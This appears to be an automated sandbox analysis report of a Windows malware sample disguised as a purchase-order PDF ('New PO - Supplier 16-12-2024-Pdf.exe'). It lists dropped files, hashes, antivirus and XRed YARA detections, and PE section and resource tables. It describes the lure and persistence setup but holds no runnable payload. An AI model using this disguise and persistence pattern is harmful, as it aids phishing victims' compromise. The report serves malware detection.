                                                                                                                      Entropy (8bit):5.260463139233421
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0ebbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Zb+pAZewRDK4mW
                                                                                                                      MD5:377E146287E282F7DD4CE99B5EBBB4F5
                                                                                                                      SHA1:8D23F3C818F8C6C453027D71DD23B249B8C52249
                                                                                                                      SHA-256:33119FD078EA70C9302E0C4024B737D0F234388764ED72CD3A213D7DEEDEE755
                                                                                                                      SHA-512:8AC676BEE04F27EF3E2B4FC6C499B75D6776DA1A8626FD320CCF22CD80A31468F9DF7E018E335C470D3979D3A24C51964AE3BA5F1C1758C5E9C06A8E722A5D04
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.252006164797164
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+00SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                                      MD5:3ABDC310686F557106AAE76C7944F1D6
                                                                                                                      SHA1:12528D3F6E23487153084A2D562F76804D954F15
                                                                                                                      SHA-256:8F814FEED9D19C51A5EAA3015D0E9EE54F80D6688A7B36E54B183FAE6ED281E6
                                                                                                                      SHA-512:2F688F3A8014FC0D014510A6AF85D061D0019D38B299FEC182C6DDF21271A02AEB63B51158C215BF100CFF1AEB6A2DEAD60B392D45832EE4479B1DCAB4ACE17B
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.267798918850528
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                                                      MD5:8E3A89B49641BCAB9B6F355A814C845F
                                                                                                                      SHA1:A320D00362340D578A87482430BCC21E71BC17B4
                                                                                                                      SHA-256:D4F4C8E1A6A84D06D4D4A21B62EFEAB24E5FC7C7012A871C76A54C3335C320FF
                                                                                                                      SHA-512:B52C44EA5135727D527E5BD94A42864634069CA0417E6F0038F6FA8064EA6B0359C8D87BA5851DCED15AF3EDBEAA10037B63C35DB0DF1818B5CDBE4CF81C26E7
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.246363630581017
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0oUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Q+pAZewRDK4mW
                                                                                                                      MD5:7C6CB0AAA5E135AB24A4A06F06BFBD71
                                                                                                                      SHA1:76DC1AF692A99052D71CF821AD084B237DC86E45
                                                                                                                      SHA-256:CCF1461B4F7797A71701343AE7635B844AFB4D880442BECF6DAE329D507C8532
                                                                                                                      SHA-512:F86FDAF5AEDAF9635DF82DA7DB6ED59647E575B7F24180AF59EF89731BBD5DDBF10484A0C870BF54249B7A4BDC4D4EE5F78EF62F534FD484A4162B4FFE909DA0
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.251708438717126
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0kQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+TQ+pAZewRDK4mW
                                                                                                                      MD5:74D95ECBA909ED08A7353C33F47946FA
                                                                                                                      SHA1:E33ECFCC5C77EAB4128AD8290940D78123022879
                                                                                                                      SHA-256:41046D9879713E13201B3636A4FFEE545BD4F339A067CEE9E28EFCE30C0320E0
                                                                                                                      SHA-512:E9E5E22F18574FB5993DC166EDF3C51670C406B0E6BF33C55F964B5DB1FABD3A80D07B124078816DBB92B75FDFAC1B8F502500AA25A5DA9A236E7376100A4E03
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.266645006421247
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.248589973671497
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.262457409575948
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.259773263731156
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.273898229746175
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2713699107810985
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.269260888522754
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2560251255999395
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.25740421357173
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2525144138374165
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.272480117144151
                                                                                                                      Encrypted:false
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):165
                                                                                                                      Entropy (8bit):1.610853976637159
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:iXFQLjLlAWFd:97
                                                                                                                      MD5:CA2C2DB316A89F044206082EEB3A366E
                                                                                                                      SHA1:B1B7DFF94B991B26093AA29BF3793DDE245412E1
                                                                                                                      SHA-256:12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
                                                                                                                      SHA-512:66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
                                                                                                                      Malicious:false
                                                                                                                      Preview:.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32768
                                                                                                                      Entropy (8bit):3.746897789531007
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                      MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                      SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                      SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                      SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:40:28 2024, mtime=Mon Dec 30 09:40:28 2024, atime=Mon Dec 30 09:40:28 2024, length=1432064, window=hide
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1814
                                                                                                                      Entropy (8bit):3.4190393034798285
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:8chDvlXUEezeC67IPIAFaFhoE2+s9T4IlD5m:8chDvl1a5HImr9MIlt
                                                                                                                      MD5:F883D1C72C50DE18A4AA588458B9B8CB
                                                                                                                      SHA1:0434B8E0080CAF085D4F8F5C4147CEB42C118B35
                                                                                                                      SHA-256:F1DA1C50E1A334BC45FF497A3E0EECF13DED1BAD248FE493EBB20D0CC3017741
                                                                                                                      SHA-512:8608E5FFECE32E293109C4BCBB805FCC2A8F3E161988D929867ABA2A7AE243FEDD813F2B6A0A2F7B127DB4BBC771CFB7BB7A0EC18BBF4D7D5B7A198721D79050
                                                                                                                      Malicious:false
                                                                                                                      Preview:L..................F.@.. ...@1.=.Z.....=.Z.....=.Z............................:..DG..Yr?.D..U..k0.&...&.......$..S......7.Z...}.>.Z......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.U...........................^.A.p.p.D.a.t.a...B.V.1......Y.U..Roaming.@......EW<2.Y.U..../.....................r...R.o.a.m.i.n.g.....V.1......Y.U..Windata.@......Y.U.Y.U...........................O?.W.i.n.d.a.t.a.....`.2......Y.U .TXAASJ.exe..F......Y.U.Y.U...........................l..T.X.A.A.S.J...e.x.e.......c...............-.......b...........s..R.....C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.T.X.A.A.S.J...e.x.e.,.".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll......................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1432064
                                                                                                                      Entropy (8bit):7.20532961543164
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Z4lavt0LkLL9IMixoEgea2A08ob7xV6+SXq8iMPRNhJNcbq9MmCS:okwkn9IMHea2A07SXq6zMaPCS
                                                                                                                      MD5:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      SHA1:4430A5461B9C0B5FB8AD0398EDAD7B5E89159441
                                                                                                                      SHA-256:90520E67BFFE18505E7D77356A0ADBF8AB6663862EF765387EEAF6E2CE5A32D6
                                                                                                                      SHA-512:4F953EAD572C92BDE737227C1AFA88BC2D274118E42C99E9245405B4748FA0F258CA8B334ECF219E5C7D2ADBBF9185CA4CBBDCC5EF312C26AA7E81BD32D0610C
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                      Process:C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1432064
                                                                                                                      Entropy (8bit):7.20532961543164
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Z4lavt0LkLL9IMixoEgea2A08ob7xV6+SXq8iMPRNhJNcbq9MmCS:okwkn9IMHea2A07SXq6zMaPCS
                                                                                                                      MD5:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                      SHA1:4430A5461B9C0B5FB8AD0398EDAD7B5E89159441
                                                                                                                      SHA-256:90520E67BFFE18505E7D77356A0ADBF8AB6663862EF765387EEAF6E2CE5A32D6
                                                                                                                      SHA-512:4F953EAD572C92BDE737227C1AFA88BC2D274118E42C99E9245405B4748FA0F258CA8B334ECF219E5C7D2ADBBF9185CA4CBBDCC5EF312C26AA7E81BD32D0610C
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18387
                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):165
                                                                                                                      Entropy (8bit):1.610853976637159
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:iXFQLjLlAWFd:97
                                                                                                                      MD5:CA2C2DB316A89F044206082EEB3A366E
                                                                                                                      SHA1:B1B7DFF94B991B26093AA29BF3793DDE245412E1
                                                                                                                      SHA-256:12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
                                                                                                                      SHA-512:66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
                                                                                                                      Malicious:false
                                                                                                                      Preview:.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):771584
                                                                                                                      Entropy (8bit):6.638013190381294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                      MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                      SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                      SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                      SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1835008
                                                                                                                      Entropy (8bit):4.468706863402155
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:gzZfpi6ceLPx9skLmb0fhZWSP3aJG8nAgeiJRMMhA2zX4WABluuNZjDH5S:2ZHthZWOKnMM6bFpLj4
                                                                                                                      MD5:BA1728EA73BC8ECAE632203EB6567049
                                                                                                                      SHA1:73C6CDEC9D039C624BCE4D343A25365C0E85F99D
                                                                                                                      SHA-256:7CEBFA5FDE360BFAEFF01ACF35C694A5ADC95D1EE6900580D2DAC081948D8CA2
                                                                                                                      SHA-512:DFA945ABDB760AF9AE6BA2CEA4A2362C02CB6E86493F8B79A5C1454E46AC7B1D7AC22A4F843052790E8B9D826A8BB78AE712578EB32CC60BA4E0A0C2F370EEBD
                                                                                                                      Malicious:false
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.056405744702409
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.57%
                                                                                                                      • Win32 Executable Borland Delphi 7 (665061/41) 6.16%
                                                                                                                      • Windows ActiveX control (116523/4) 1.08%
                                                                                                                      • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                      File name:New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File size:2'203'648 bytes
                                                                                                                      MD5:38d3095d1b748cd53c65395718d7c5f4
                                                                                                                      SHA1:3c0221471b641a641a9141a731f6ee09663e6538
                                                                                                                      SHA256:f3724bf49bfd8d11ef1f81b4c6aebc4d3281cecfa357d4fb3ae388a4add242e6
                                                                                                                      SHA512:f0ab6ed5dfa52d8159c5090fd96087ba8e89c26c2fdb90fae3f4d19b6952250ecd49846b9198d7c77affb6fabe3a0e53758392409a73552b202591433afc03e6
                                                                                                                      SSDEEP:49152:ZnsHyjtk2MYC5GDqkwkn9IMHea2A07SXq6zMaPCSO:Znsmtk2acdnV+FSvPCt
                                                                                                                      TLSH:B6A5CF62B3C58176C273523AAC37A752AC3B7E191D34B54F3FE42E1DAE35342151A2A3
                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                      Icon Hash:2eec8e8cb683b9b1
                                                                                                                      Entrypoint:0x49ab80
                                                                                                                      Entrypoint Section:CODE
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                      DLL Characteristics:
                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      add esp, FFFFFFF0h
                                                                                                                      mov eax, 0049A778h
                                                                                                                      call 00007F6DF0AF236Dh
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007F6DF0B45CB5h
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      mov edx, 0049ABE0h
                                                                                                                      call 00007F6DF0B458B4h
                                                                                                                      mov ecx, dword ptr [0049DBDCh]
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      mov edx, dword ptr [00496590h]
                                                                                                                      call 00007F6DF0B45CA4h
                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                      call 00007F6DF0B45D18h
                                                                                                                      call 00007F6DF0AEFE4Bh
                                                                                                                      add byte ptr [eax], al

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x16f730 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
| .reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb0000 | 0x16f730 | 0x16f800 | 1afc13ddd1c5a98d51946e6356c153e9 | False | 0.6416520514455782 | data | 7.1581346783004784 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635 |
| RT_CURSOR | 0xb0efc | 0x134 | data | | | 0.4642857142857143 |
| RT_CURSOR | 0xb1030 | 0x134 | data | | | 0.4805194805194805 |
| RT_CURSOR | 0xb1164 | 0x134 | data | | | 0.38311688311688313 |
| RT_CURSOR | 0xb1298 | 0x134 | data | | | 0.36038961038961037 |
| RT_CURSOR | 0xb13cc | 0x134 | data | | | 0.4090909090909091 |
| RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468 |
| RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066 |
| RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125 |
| RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066 |
| RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414 |
| RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414 |
| RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931 |
| RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793 |
| RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105 |
| RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896 |
| RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105 |
| RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414 |
| RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.36350844277673544 |
| RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516 |
| RT_DIALOG | 0xb4aa0 | 0x52 | data | | | 0.7682926829268293 |
| RT_STRING | 0xb4af4 | 0x358 | data | | | 0.3796728971962617 |
| RT_STRING | 0xb4e4c | 0x428 | data | | | 0.37406015037593987 |
